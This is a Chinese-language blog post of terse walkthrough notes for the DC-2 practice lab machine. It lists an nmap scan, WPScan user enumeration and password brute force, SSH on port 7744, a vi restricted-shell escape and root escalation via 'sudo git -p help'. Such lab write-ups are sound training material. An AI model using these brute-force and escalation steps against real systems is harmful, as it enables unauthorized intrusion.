DC-2

发现主机

扫描主机

nmap -A -T4 -v -p- 192.168.233.148

访问80

访问不同

hosts文件修改

vim /etc/hosts

再次访问(flag1)

默认后台

制作字典（crew）

密码

用户名

wpscan扫描

wpscan --url http://dc-2 -e u

保存

爆破

wpscan --url http://dc-2 -U username.txt -P passwd.txt

尝试7744端口

ssh登录

Jerry 无法登录

tom 可以登录

搜索查看命令

导出环境变量

查看可以使用的命令

使用less查看flag3

切换到jerry

su无法使用

Restricted shell绕过

vi 3
:set shell =/bin/sh
:shell（执行完上一条再执行）
export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin （设置环境变量）

flag4

git提权

提示git nopasswd

提权命令

sudo git -p help

修改root密码

切换到root

posted @ 2021-03-06 19:09 木捏牛阅读(105) 评论(0) 收藏举报

刷新页面返回顶部

木捏牛

除却巫山不是云

DC-2

DC-2

发现主机

扫描主机

访问80

hosts文件修改

再次访问(flag1)

默认后台

制作字典（crew）

密码

用户名

爆破

登录

jerry

tom

尝试7744端口

ssh登录

Jerry 无法登录

tom 可以登录

搜索查看命令

导出环境变量

查看可以使用的命令

使用less查看flag3

切换到jerry

su无法使用

Restricted shell绕过

flag4

git提权

提权命令

修改root密码

切换到root

公告